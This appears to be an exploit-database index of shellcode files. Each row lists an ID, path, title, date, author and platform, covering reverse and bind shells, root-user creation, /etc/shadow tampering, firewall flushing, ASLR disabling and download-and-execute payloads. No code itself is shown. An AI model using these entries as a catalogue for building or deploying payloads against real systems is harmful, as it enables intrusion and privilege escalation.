151 13393 shellcodes/linux_x86/13393.c Linux/x86 - Reverse TCP Shell (127.0.0.1:31337/TCP) Shellcode (74 bytes) Linux/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell Shellcode (74 bytes) 2006-01-21 izik shellcode linux_x86
152 13394 shellcodes/linux_x86/13394.c Linux/x86 - Normal Exit With Random (So To Speak) Return Value Shellcode (5 bytes) 2006-01-21 izik shellcode linux_x86
153 13395 shellcodes/linux_x86/13395.c Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes) 2006-01-21 izik shellcode linux_x86
154 13396 shellcodes/linux_x86/13396.c Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit Shellcode (4 bytes) 2006-01-21 izik shellcode linux_x86
182 13424 shellcodes/linux_x86/13424.txt Linux/x86 - execve /bin/sh Alphanumeric Shellcode (392 bytes) 2004-09-26 RaiSe shellcode linux_x86
183 13425 shellcodes/linux_x86/13425.c Linux/IA32 - execve /bin/sh 0xff-Free Shellcode (45 bytes) 2004-09-26 anathema shellcode linux_x86
184 13426 shellcodes/linux_x86/13426.c Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes) 2004-09-26 dev0id shellcode linux_x86
185 13427 shellcodes/linux_x86/13427.c Linux/x86 - Bind TCP Shell (5074/TCP) ToUpper Encoded Shellcode (226 bytes) Linux/x86 - Bind TCP (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes) 2004-09-26 Tora shellcode linux_x86
186 13428 shellcodes/linux_x86/13428.c Linux/x86 - Add Root User (t00r) Anti-IDS Shellcode (116 bytes) 2004-09-26 Matias Sedalo shellcode linux_x86
187 13429 shellcodes/linux_x86/13429.c Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes) 2004-09-26 Matias Sedalo shellcode linux_x86
188 13430 shellcodes/linux_x86/13430.c Linux/x86 - symlink . /bin/sh Shellcode (32 bytes) 2004-09-26 dev0id shellcode linux_x86
191 13433 shellcodes/linux_x86/13433.c Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes) 2004-09-26 UnboundeD shellcode linux_x86
192 13434 shellcodes/linux_x86/13434.c Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (58 bytes) 2004-09-26 dev0id shellcode linux_x86
193 13435 shellcodes/linux_x86/13435.c Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes) 2004-09-26 hts shellcode linux_x86
194 13436 shellcodes/linux_x86/13436.c Linux/x86 - Reverse TCP /bin/sh Shell Shellcode (120 bytes) Linux/x86 - Reverse TCP Shell (/bin/sh) Shellcode (120 bytes) 2004-09-26 lamagra shellcode linux_x86
195 13437 shellcodes/linux_x86/13437.c Linux/x86 - chmod 666 /etc/shadow Shellcode (41 bytes) 2004-09-26 Matias Sedalo shellcode linux_x86
196 13438 shellcodes/linux_x86/13438.c Linux/x86 - cp /bin/sh /tmp/katy + chmod 4555 katy Shellcode (126 bytes) 2004-09-26 RaiSe shellcode linux_x86
197 13439 shellcodes/linux_x86/13439.c Linux/x86 - Eject /dev/cdrom Shellcode (64 bytes) 2004-09-26 lamagra shellcode linux_x86
203 13445 shellcodes/linux_x86/13445.c Linux/x86 - execve /bin/sh Shellcode (38 bytes) 2004-09-12 Matias Sedalo shellcode linux_x86
204 13446 shellcodes/linux_x86/13446.c Linux/x86 - execve /bin/sh Shellcode (30 bytes) 2004-09-12 Matias Sedalo shellcode linux_x86
205 13447 shellcodes/linux_x86/13447.c Linux/x86 - execve /bin/sh + setreuid(12_12) Shellcode (50 bytes) 2004-09-12 anonymous shellcode linux_x86
206 13448 shellcodes/linux_x86/13448.c Linux/x86 - Bind TCP Shell (5074/TCP) Shellcode (92 bytes) Linux/x86 - Bind TCP (5074/TCP) Shell Shellcode (92 bytes) 2004-09-12 Matias Sedalo shellcode linux_x86
207 13449 shellcodes/linux_x86/13449.c Linux/x86 - Bind TCP Shell (5074/TCP) + fork() Shellcode (130 bytes) Linux/x86 - Bind TCP (5074/TCP) Shell + fork() Shellcode (130 bytes) 2004-09-12 Matias Sedalo shellcode linux_x86
208 13450 shellcodes/linux_x86/13450.c Linux/x86 - Add Root User (t00r) Shellcode (82 bytes) 2004-09-12 Matias Sedalo shellcode linux_x86
209 13451 shellcodes/linux_x86/13451.c Linux/x86 - Add Root User Shellcode (104 bytes) 2004-09-12 Matt Conover shellcode linux_x86
210 13452 shellcodes/linux_x86/13452.c Linux/x86 - Break chroot (../ 10x Loop) Shellcode (34 bytes) 2004-09-12 dev0id shellcode linux_x86
217 13460 shellcodes/linux_x86/13460.c Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (55 bytes) 2000-08-08 anonymous shellcode linux_x86
218 13461 shellcodes/linux_x86/13461.c Linux/x86 - Add Root User (z) Shellcode (70 bytes) 2000-08-07 anonymous shellcode linux_x86
219 13462 shellcodes/linux_x86/13462.c Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve /bin/sh Shellcode (132 bytes) 2000-08-07 anonymous shellcode linux_x86
220 13463 shellcodes/linux_x86-64/13463.c Linux/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (132 bytes) Linux/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes) 2009-05-18 evil.xi4oyu shellcode linux_x86-64
221 13464 shellcodes/linux_x86-64/13464.s Linux/x86-64 - execve /bin/sh Shellcode (33 bytes) 2006-11-02 hophet shellcode linux_x86-64
222 13465 shellcodes/multiple/13465.c Linux/PPC / Linux/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes) 2005-11-15 Charles Stevenson shellcode multiple
223 13466 shellcodes/multiple/13466.c OSX/PPC / OSX/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes) 2005-11-13 nemo shellcode multiple
225 13468 shellcodes/multiple/13468.c Linux/x86 / Unix/SPARC - execve /bin/sh Shellcode (80 bytes) 2004-09-12 dymitri shellcode multiple
226 13469 shellcodes/multiple/13469.c BSD/x86 / Linux/x86 - execve /bin/sh Shellcode (38 bytes) 2004-09-12 dymitri shellcode multiple
227 13470 shellcodes/netbsd_x86/13470.c NetBSD/x86 - Kill All Processes Shellcode (23 bytes) 2009-06-18 anonymous shellcode netbsd_x86
228 13471 shellcodes/netbsd_x86/13471.c NetBSD/x86 - Reverse TCP Shell (6666/TCP) Shellcode (83 bytes) NetBSD/x86 - Reverse TCP (6666/TCP) Shell Shellcode (83 bytes) 2005-11-30 p. minervini shellcode netbsd_x86
229 13472 shellcodes/netbsd_x86/13472.c NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes) NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (29 bytes) 2005-11-30 p. minervini shellcode netbsd_x86
230 13473 shellcodes/netbsd_x86/13473.c NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes) NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (30 bytes) 2005-11-30 p. minervini shellcode netbsd_x86
231 13474 shellcodes/netbsd_x86/13474.txt NetBSD/x86 - execve /bin/sh Shellcode (68 bytes) 2004-09-26 humble shellcode netbsd_x86
232 13475 shellcodes/openbsd_x86/13475.c OpenBSD/x86 - execve /bin/sh Shellcode (23 bytes) 2006-05-01 hophet shellcode openbsd_x86
233 13476 shellcodes/openbsd_x86/13476.c OpenBSD/x86 - Bind TCP Shell (6969/TCP) Shellcode (148 bytes) OpenBSD/x86 - Bind TCP (6969/TCP) Shell Shellcode (148 bytes) 2004-09-26 Sinan Eren shellcode openbsd_x86
234 13477 shellcodes/openbsd_x86/13477.c OpenBSD/x86 - Add Root User (w00w00) Shellcode (112 bytes) 2004-09-26 anonymous shellcode openbsd_x86
235 13478 shellcodes/osx_ppc/13478.c OSX/PPC - sync() + reboot() Shellcode (32 bytes) 2006-05-01 hophet shellcode osx_ppc
236 13479 shellcodes/osx_ppc/13479.c OSX/PPC - execve(/bin/sh) + exit() Shellcode (72 bytes) 2006-05-01 hophet shellcode osx_ppc
245 13488 shellcodes/sco_x86/13488.c SCO/x86 - execve(_/bin/sh__ ..._ NULL) Shellcode (43 bytes) 2005-11-30 p. minervini shellcode sco_x86
246 13489 shellcodes/solaris_sparc/13489.c Solaris/SPARC - Download File (http://evil-dl/) + Execute (/tmp/ff) Shellcode (278 bytes) 2006-11-21 xort shellcode solaris_sparc
247 13490 shellcodes/solaris_sparc/13490.c Solaris/SPARC - setreuid + Executes Command Shellcode (92+ bytes) 2006-10-21 bunker shellcode solaris_sparc
248 13491 shellcodes/generator/13491.c Solaris/SPARC - Reverse TCP Shell (44434/TCP) XNOR Encoded Shellcode (600 bytes) (Generator) Solaris/SPARC - Reverse TCP (44434/TCP) Shell + XNOR Encoded Shellcode (600 bytes) (Generator) 2006-07-21 xort shellcode generator
249 13492 shellcodes/solaris_sparc/13492.c Solaris/SPARC - setreuid + execve Shellcode (56 bytes) 2005-11-20 lhall shellcode solaris_sparc
250 13493 shellcodes/solaris_sparc/13493.c Solaris/SPARC - Bind TCP Shell (6666/TCP) Shellcode (240 bytes) Solaris/SPARC - Bind TCP (6666/TCP) Shell Shellcode (240 bytes) 2005-11-20 lhall shellcode solaris_sparc
251 13494 shellcodes/solaris_sparc/13494.txt Solaris/SPARC - execve /bin/sh Shellcode (52 bytes) 2004-09-26 LSD-PLaNET shellcode solaris_sparc
252 13495 shellcodes/solaris_sparc/13495.c Solaris/SPARC - Bind TCP /bin/sh Shell (6789/TCP) Shellcode (228 bytes) Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes) 2004-09-26 Claes Nyberg shellcode solaris_sparc
253 13496 shellcodes/solaris_sparc/13496.c Solaris/SPARC - Reverse TCP /bin/sh Shell (192.168.1.4:5678/TCP) Shellcode (204 bytes) Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes) 2004-09-26 Claes Nyberg shellcode solaris_sparc
254 13497 shellcodes/solaris_sparc/13497.txt Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes) 2000-11-19 dopesquad.net shellcode solaris_sparc
255 13498 shellcodes/generator/13498.php Solaris/x86 - Bind TCP Shell Shellcode (Generator) 2009-06-16 Jonathan Salwan shellcode generator
256 13499 shellcodes/solaris_x86/13499.c Solaris/x86 - setuid(0) + execve(//bin/sh) + exit(0) Null-Free Shellcode (39 bytes) 2008-12-02 sm4x shellcode solaris_x86
258 13501 shellcodes/solaris_x86/13501.txt Solaris/x86 - execve /bin/sh ToUpper Encoded Shellcode (84 bytes) 2004-09-26 anonymous shellcode solaris_x86
259 13502 shellcodes/solaris_x86/13502.txt Solaris/x86 - inetd Add Service + execve Shellcode (201 bytes) 2004-09-26 anonymous shellcode solaris_x86
260 13503 shellcodes/unixware/13503.txt UnixWare - execve /bin/sh Shellcode (95 bytes) 2004-09-26 K2 shellcode unixware
261 13504 shellcodes/windows_x86/13504.asm Windows 5.0 < 7.0 x86 - Bind TCP Shell (28876/TCP) Null-Free Shellcode Windows 5.0 < 7.0 x86 - Bind TCP (28876/TCP) Shell + Null-Free Shellcode 2009-07-27 Skylined shellcode windows_x86
262 13505 shellcodes/windows_x86/13505.c Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes) 2009-07-17 Stack shellcode windows_x86
263 13507 shellcodes/windows_x86/13507.txt Windows x86 - Egg Omelet SEH Shellcode 2009-03-16 Skylined shellcode windows_x86
264 13508 shellcodes/windows_x86/13508.asm Windows x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes) 2009-02-27 DATA_SNIPER shellcode windows_x86
281 13525 shellcodes/windows_x86/13525.c Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes) 2005-07-26 loco shellcode windows_x86
282 13526 shellcodes/windows_x86/13526.c Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes) 2005-01-26 twoci shellcode windows_x86
283 13527 shellcodes/windows_x86/13527.c Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes) 2005-01-09 oc192 shellcode windows_x86
284 13528 shellcodes/generator/13528.c Windows XP/2000/2003 - Reverse TCP Shell (127.0.0.1:53/TCP) Shellcode (275 bytes) (Generator) Windows XP/2000/2003 - Reverse TCP (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator) 2004-10-25 lion shellcode generator
285 13529 shellcodes/windows_x86/13529.c Windows XP/2000/2003 - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes) 2004-10-25 lion shellcode windows_x86
286 13530 shellcodes/windows_x86/13530.asm Windows XP - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) Null-Free Shellcode 2004-09-26 Peter Winter-Smith shellcode windows_x86
287 13531 shellcodes/windows_x86/13531.c Windows XP SP1 - Bind TCP Shell (58821/TCP) Shellcode (116 bytes) Windows XP SP1 - Bind TCP (58821/TCP) Shell Shellcode (116 bytes) 2004-09-26 silicon shellcode windows_x86
288 13532 shellcodes/windows_x86/13532.asm Windows - DCOM RPC2 Universal Shellcode 2003-10-09 anonymous shellcode windows_x86
289 13533 shellcodes/windows_x86-64/13533.asm Windows x64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes) 2006-08-07 Weiss shellcode windows_x86-64
290 13548 shellcodes/linux_x86/13548.asm Linux/x86 - Kill All Processes Shellcode (9 bytes) 2010-01-14 root@thegibson shellcode linux_x86
297 13565 shellcodes/windows_x86/13565.asm Windows XP SP3 x86 - ShellExecuteA Shellcode 2009-12-19 sinn3r shellcode windows_x86
298 13566 shellcodes/linux_x86/13566.c Linux/x86 - setreuid (0_0) + execve(/bin/rm /etc/shadow) Shellcode 2009-12-19 mr_me shellcode linux_x86
299 13569 shellcodes/windows_x86/13569.asm Windows XP SP3 x86 - Add Firewall Rule (Allow 445/TCP) Traffic Shellcode 2009-12-24 sinn3r shellcode windows_x86
300 13570 shellcodes/freebsd_x86/13570.c FreeBSD/x86 - Bind TCP /bin/sh Shell (1337/TCP) Shellcode (167 bytes) FreeBSD/x86 - Bind TCP (1337/TCP) Shell (/bin/sh) Shellcode (167 bytes) 2009-12-24 sbz shellcode freebsd_x86
301 13571 shellcodes/windows_x86/13571.c Windows XP SP2 x86 - calc.exe Shellcode (45 bytes) 2009-12-24 Stack shellcode windows_x86
302 13572 shellcodes/linux_x86/13572.c Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes) 2009-12-24 sandman shellcode linux_x86
303 13574 shellcodes/windows_x86/13574.c Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes) 2009-12-28 AnTi SeCuRe shellcode windows_x86
329 13647 shellcodes/windows_x86/13647.txt Windows XP SP3 x86 (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes) 2010-03-24 lord Kelvin shellcode windows_x86
330 13648 shellcodes/windows_x86/13648.rb Windows x86 - MessageBox Shellcode (Metasploit) 2010-03-24 corelanc0d3r shellcode windows_x86
331 13649 shellcodes/windows/13649.txt Windows XP/Vista/7 - Egghunter JITed Stage-0 Adjusted Universal Shellcode 2010-03-27 Alexey Sintsov shellcode windows
332 13661 shellcodes/linux_x86/13661.txt Linux/x86 - Bind Netcat Shell (13377/TCP) Shellcode Linux/x86 - Bind TCP (13377/TCP) Netcat Shell Shellcode 2010-04-02 anonymous shellcode linux_x86
333 13669 shellcodes/linux_x86/13669.c Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes) 2010-04-14 Magnefikko shellcode linux_x86
334 13670 shellcodes/linux_x86-64/13670.c Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (2) 2010-04-14 Magnefikko shellcode linux_x86-64
335 13671 shellcodes/linux_x86/13671.c Linux/x86 - DoS Badger Game Shellcode (6 bytes) 2010-04-14 Magnefikko shellcode linux_x86
370 13733 shellcodes/solaris/13733.c Solaris/x86 - SystemV killall Command Shellcode (39 bytes) 2010-06-03 Jonathan Salwan shellcode solaris
371 13742 shellcodes/linux_x86/13742.c Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes) 2010-06-06 gunslinger_ shellcode linux_x86
372 13743 shellcodes/linux_x86/13743.c Linux/x86 - Give All Users Root Access When Executing /bin/sh Shellcode (45 bytes) 2010-06-06 gunslinger_ shellcode linux_x86
373 14334 shellcodes/linux_x86/14334.c Linux/x86 - Reverse Netcat Shell (8080/TCP) Shellcode (76 bytes) Linux/x86 - Reverse TCP (8080/TCP) Netcat Shell Shellcode (76 bytes) 2010-07-11 blake shellcode linux_x86
374 13828 shellcodes/windows/13828.c Windows - MessageBoxA Shellcode (238 bytes) 2010-06-11 RubberDuck shellcode windows
375 13875 shellcodes/solaris_x86/13875.c Solaris/x86 - Sync() + reboot() + exit(0) Shellcode (48 bytes) 2010-06-14 Jonathan Salwan shellcode solaris_x86
376 13908 shellcodes/linux_x86-64/13908.c Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes) 2010-06-17 Jonathan Salwan shellcode linux_x86-64
377 13910 shellcodes/linux_x86/13910.c Linux/x86 - Bind TCP Shell (31337/TCP) + setreuid(0_0) Polymorphic Shellcode (131 bytes) Linux/x86 - Bind TCP (31337/TCP) Shell + setreuid(0_0) + Polymorphic Shellcode (131 bytes) 2010-06-17 gunslinger_ shellcode linux_x86
378 13915 shellcodes/linux_x86-64/13915.txt Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes) 2010-06-17 Jonathan Salwan shellcode linux_x86-64
379 13943 shellcodes/linux_x86-64/13943.c Linux/x86-64 - Add Root User (shell-storm/leet) Shellcode (390 bytes) 2010-06-20 Jonathan Salwan shellcode linux_x86-64
380 14014 shellcodes/windows_x86/14014.pl Windows XP SP3 (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes) 2010-06-24 d0lc3 shellcode windows_x86
386 14122 shellcodes/arm/14122.txt Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes) 2010-06-29 Florian Gaultier shellcode arm
387 14139 shellcodes/arm/14139.c Linux/ARM - Disable ASLR Security Shellcode (102 bytes) 2010-06-30 Jonathan Salwan shellcode arm
388 14190 shellcodes/arm/14190.c Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) XOR 88 Encoded Polymorphic Shellcode (78 bytes) 2010-07-03 Jonathan Salwan shellcode arm
389 14216 shellcodes/linux_x86/14216.c Linux/x86 - Bind TCP /bin/sh Shell (64533/TCP) Shellcode (97 bytes) Linux/x86 - Bind TCP (64533/TCP) Shell (/bin/sh) Shellcode (97 bytes) 2010-07-05 Magnefikko shellcode linux_x86
390 14218 shellcodes/linux/14218.c Linux - Write SUID Root Shell (/tmp/.hiddenshell) Polymorphic Shellcode (161 bytes) 2010-07-05 gunslinger_ shellcode linux
391 14219 shellcodes/linux/14219.c Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes) 2010-07-05 gunslinger_ shellcode linux
392 14221 shellcodes/windows/14221.html Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Null-Free Shellcode 2010-07-05 Alexey Sintsov shellcode windows
393 14234 shellcodes/linux/14234.c Linux - Bind TCP Shell (6778/TCP) XOR Encoded Polymorphic Shellcode (125 bytes) Linux - Bind TCP (6778/TCP) Shell + XOR Encoded Polymorphic Shellcode (125 bytes) 2010-07-05 gunslinger_ shellcode linux
394 14235 shellcodes/linux/14235.c Linux - Bind Netcat Shell (31337/TCP) Polymorphic Shellcode (91 bytes) Linux - Bind TCP (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes) 2010-07-05 gunslinger_ shellcode linux
395 14261 shellcodes/generator/14261.c Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator) 2010-07-07 Jonathan Salwan shellcode generator
396 14276 shellcodes/linux/14276.c Linux - Find All Writeable Folder In FileSystem Polymorphic Shellcode (91 bytes) 2010-07-08 gunslinger_ shellcode linux
397 14288 shellcodes/windows_x86/14288.asm Windows x86 - Write-to-file ('pwned' ./f.txt) Null-Free Shellcode (278 bytes) 2010-07-09 Brett Gervasoni shellcode windows_x86
398 14305 shellcodes/linux_x86-64/14305.c Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes) 2010-07-09 10n1z3d shellcode linux_x86-64
399 14332 shellcodes/linux_x86/14332.c Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (8080/TCP) Shellcode (75 bytes) Linux/x86 - Bind TCP (8080/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (75 bytes) 2010-07-11 blake shellcode linux_x86
400 14691 shellcodes/linux_x86/14691.c Linux/x86 - execve /bin/sh Polymorphic Null-Free Shellcode (46 bytes) 2010-08-19 Aodrulez shellcode linux_x86
401 14697 shellcodes/windows/14697.c Windows XP SP3 (English) - MessageBoxA Shellcode (87 bytes) 2010-08-20 Glafkos Charalambous shellcode windows
402 14795 shellcodes/bsd_x86/14795.c BSD/x86 - Bind TCP Shell (2525/TCP) Shellcode (167 bytes) BSD/x86 - Bind TCP (2525/TCP) Shell Shellcode (167 bytes) 2010-08-25 beosroot shellcode bsd_x86
403 14873 shellcodes/windows_x86/14873.asm Windows x86 - Egghunter Checksum Routine Shellcode (18 bytes) 2010-09-02 dijital1 shellcode windows_x86
404 14907 shellcodes/arm/14907.c Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes) 2010-09-05 Jonathan Salwan shellcode arm
405 15063 shellcodes/windows_x86/15063.c Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes) 2010-09-20 ZoRLu shellcode windows_x86
407 15136 shellcodes/windows/15136.cpp Windows Mobile 6.5 TR - Phone Call Shellcode 2010-09-27 Celil Ünüver shellcode windows
408 15202 shellcodes/windows_x86/15202.c Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes) 2010-10-04 Anastasios Monachos shellcode windows_x86
409 15203 shellcodes/windows_x86/15203.c Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes) 2010-10-04 Anastasios Monachos shellcode windows_x86
410 15314 shellcodes/arm/15314.asm Linux/ARM - Bind TCP Shell (0x1337/TCP) Shellcode Linux/ARM - Bind TCP (0x1337/TCP) Shell Shellcode 2010-10-26 Daniel Godas-Lopez shellcode arm
411 15315 shellcodes/arm/15315.asm Linux/ARM - Bind UDP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode Linux/ARM - Bind UDP (68/UDP) Listener + Reverse TCP (192.168.0.1:67/TCP) Shell Shellcode 2010-10-26 Daniel Godas-Lopez shellcode arm
412 15316 shellcodes/arm/15316.asm Linux/ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode 2010-10-26 Daniel Godas-Lopez shellcode arm
413 15317 shellcodes/arm/15317.asm Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode 2010-10-26 Daniel Godas-Lopez shellcode arm
414 15616 shellcodes/arm/15616.c Linux/ARM - Add Root User (shell-storm/toor) Shellcode (151 bytes) 2010-11-25 Jonathan Salwan shellcode arm
415 15618 shellcodes/osx/15618.c OSX/Intel x86-64 - setuid shell Shellcode (51 bytes) 2010-11-25 Dustin Schultz shellcode osx
416 15712 shellcodes/generator/15712.rb ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator) 2010-12-09 Jonathan Salwan shellcode generator
417 15879 shellcodes/windows_x86/15879.txt Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode 2010-12-31 Skylined shellcode windows_x86
418 16025 shellcodes/generator/16025.c FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:1337/TCP) Shellcode (81 bytes) (Generator) FreeBSD/x86 - Reverse TCP (127.0.0.1:1337/TCP) Shell (/bin/sh) Shellcode (81 bytes) (Generator) 2011-01-21 Tosh shellcode generator
419 16026 shellcodes/freebsd_x86/16026.c FreeBSD/x86 - Bind TCP /bin/sh Shell (31337/TCP) + Fork Shellcode (111 bytes) FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + Fork Shellcode (111 bytes) 2011-01-21 Tosh shellcode freebsd_x86
420 16283 shellcodes/windows_x86/16283.txt Windows x86 - Eggsearch Shellcode (33 bytes) 2011-03-05 oxff shellcode windows_x86
421 17432 shellcodes/superh_sh4/17432.c Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes) 2011-06-22 Jonathan Salwan shellcode superh_sh4
422 17194 shellcodes/linux_x86/17194.txt Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69/93 bytes) Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic XOR Encoded Shellcode (69/93 bytes) 2011-04-21 Jonathan Salwan shellcode linux_x86
423 17224 shellcodes/osx/17224.s OSX/Intel x86-64 - Reverse TCP /bin/sh Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes) OSX/Intel x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes) 2011-04-29 hammackj shellcode osx
424 17323 shellcodes/windows/17323.c Windows - Add Local Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes) 2011-05-25 RubberDuck shellcode windows
425 20195 shellcodes/linux_x86/20195.c Linux/x86 - Disable ASLR Security Shellcode (83 bytes) 2012-08-02 Jean Pascal Pereira shellcode linux_x86
426 17326 shellcodes/generator/17326.rb Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit) 2011-05-26 Alexey Sintsov shellcode generator
427 17371 shellcodes/linux_x86/17371.txt Linux/x86 - Reverse TCP SSL Shell (localhost:8080/TCP) Shellcode (422 bytes) Linux/x86 - Reverse TCP (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes) 2011-06-08 Jonathan Salwan shellcode linux_x86
428 17439 shellcodes/superh_sh4/17439.c Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes) 2011-06-23 Jonathan Salwan shellcode superh_sh4
429 17545 shellcodes/windows_x86/17545.txt Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes) 2011-07-18 KaHPeSeSe shellcode windows_x86
430 17559 shellcodes/linux_x86/17559.c Linux/x86 - Egghunter Null-Free Shellcode (29 bytes) 2011-07-21 Ali Raheem shellcode linux_x86
435 18162 shellcodes/linux_mips/18162.c Linux/MIPS - execve /bin/sh Shellcode (48 bytes) 2011-11-27 rigan shellcode linux_mips
436 18163 shellcodes/linux_mips/18163.c Linux/MIPS - Add Root User (rOOt/pwn3d) Shellcode (164 bytes) 2011-11-27 rigan shellcode linux_mips
437 18197 shellcodes/linux_x86-64/18197.c Linux/x86-64 - execve /bin/sh Shellcode (52 bytes) 2011-12-03 X-h4ck shellcode linux_x86-64
438 18226 shellcodes/linux_mips/18226.c Linux/MIPS - Reverse TCP Shell (0x7a69/TCP) Shellcode (168 bytes) Linux/MIPS - Reverse TCP (0x7a69/TCP) Shell Shellcode (168 bytes) 2011-12-10 rigan shellcode linux_mips
439 18227 shellcodes/linux_mips/18227.c Linux/MIPS - reboot() Shellcode (32 bytes) 2011-12-10 rigan shellcode linux_mips
440 18294 shellcodes/linux_x86/18294.c Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd Polymorphic Shellcode 2011-12-31 pentesters.ir shellcode linux_x86
441 18379 shellcodes/linux_x86/18379.c Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes) 2012-01-17 rigan shellcode linux_x86
442 18585 shellcodes/linux_x86-64/18585.s Linux/x86-64 - Add Root User (t0r/Winner) Shellcode (189 bytes) 2012-03-12 0_o shellcode linux_x86-64
443 18885 shellcodes/linux_x86/18885.c Linux/x86 - execve /bin/dash Shellcode (42 bytes) 2012-05-16 X-h4ck shellcode linux_x86
444 20196 shellcodes/linux_x86/20196.c Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes) 2012-08-02 Jean Pascal Pereira shellcode linux_x86
445 21252 shellcodes/arm/21252.asm Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (10.1.1.2:0x1337/TCP) Shellcode (72 bytes) Linux/ARM (Raspberry Pi) - Reverse TCP (10.1.1.2:0x1337/TCP) Shell (/bin/sh) Shellcode (72 bytes) 2012-09-11 midnitesnake shellcode arm
446 21253 shellcodes/arm/21253.asm Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes) 2012-09-11 midnitesnake shellcode arm
447 21254 shellcodes/arm/21254.asm Linux/ARM (Raspberry Pi) - chmod 0777 /etc/shadow Shellcode (41 bytes) 2012-09-11 midnitesnake shellcode arm
448 40363 shellcodes/windows_x86/40363.c Windows x86 - Bind TCP Password (damn_it!$$##@;*#) Shell Shellcode (637 bytes) Windows x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes) 2016-09-13 Roziul Hasan Khan Shifat shellcode windows_x86
